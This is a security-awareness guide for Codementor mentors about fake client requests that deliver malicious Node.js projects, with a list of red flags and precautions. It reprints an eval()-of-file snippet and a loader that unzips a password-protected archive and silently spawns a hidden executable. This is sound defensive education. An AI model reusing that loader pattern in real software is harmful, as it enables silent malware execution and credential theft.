Staying Safe on Codementor: Recognizing and Avoiding Social Engineering Traps
As a mentor on Codementor, you may encounter client requests that seem straightforward but are actually traps designed to exploit your trust and compromise your system. These malicious requests often rely on urgency and social engineering to trick mentors into running harmful code. Here’s a concise guide to help you identify and avoid these threats.
How Malicious Requests Work
A typical malicious request might look like this:
"The first person to check the site and fix the issue will be hired."
This creates a sense of urgency, pushing you to act quickly. The client provides a direct download link (e.g., Google Drive) to a zipped project and asks you to run npm start to identify errors. If you rush to execute the code, you may unknowingly run malicious scripts that compromise your system.
Red Flags to Watch For
1. Direct Download Links
Avoid downloading projects from platforms like Google Drive or Dropbox. These lack the protections of repositories like GitHub or GitLab.
2. Suspicious package.json Files
Look for:
- Unnecessary or outdated dependencies (e.g., mailgun-js, 7zip-bin).
- Missing devDependencies for tools like nodemon.
3. Obfuscated or Hidden Code
- Files with hundreds of empty lines followed by minified or obfuscated code.
- Use tools to deobfuscate and inspect such files.
4. Compressed Files
- Large zip files (e.g., 2MB for a project that should only be a few KB) are suspicious.
- Password-protected archives are a major red flag.
5. Use of eval()
Code that uses eval() to execute strings is inherently dangerous. For example:
fs.readFile('public/css/types.txt', 'utf8', (err, data) => {
if (!err) eval(data);
});
What Happens If You Run the Code?
If you execute the malicious code, it may:
- Extract a password-protected archive using tools like 7zip-bin.
- Execute a hidden binary (e.g., app.exe) that could:
- Steal sensitive data (e.g., browser credentials, crypto wallets).
- Run in the background, undetected, while compromising your system.
For example, the malicious script might look like this:
const { exec, spawn } = require("child_process");
const zipPath = "./public/js.7zip-F.zip";
const password = " -pMALICIOUS_PASSWORD ";
const unzipCommand = `"7za" x "${zipPath}" ${password} -o"./output" -y`;
exec(unzipCommand, () => {
const extractedFile = "./output/app.exe";
if (fs.existsSync(extractedFile)) {
spawn(extractedFile, [], { detached: true, stdio: "ignore" }).unref();
}
});
How to Stay Safe
1. Inspect Everything
- Review all files, especially package.json, for unusual dependencies.
- Expand the project structure in your editor to get a sense of its complexity.
2. Avoid Direct Links
- Only accept projects hosted on trusted platforms like GitHub or GitLab.
3. Don’t Rush
- Never run npm start or any other commands without fully understanding the code.
4. Check for Obfuscation
- Search for patterns like _0x or excessive minification, which often indicate malicious intent.
5. Use a Secure Environment
- If you must test code, use a virtual machine or sandboxed environment.
6. Report Suspicious Activity
- Flag suspicious requests and report them to Codementor support.
Final Thoughts
Malicious actors often target mentors who are eager to help and earn. By staying vigilant and following these precautions, you can protect yourself and your clients from potential harm. Remember, no amount of money is worth compromising your system or reputation.
Stay safe, and happy mentoring!
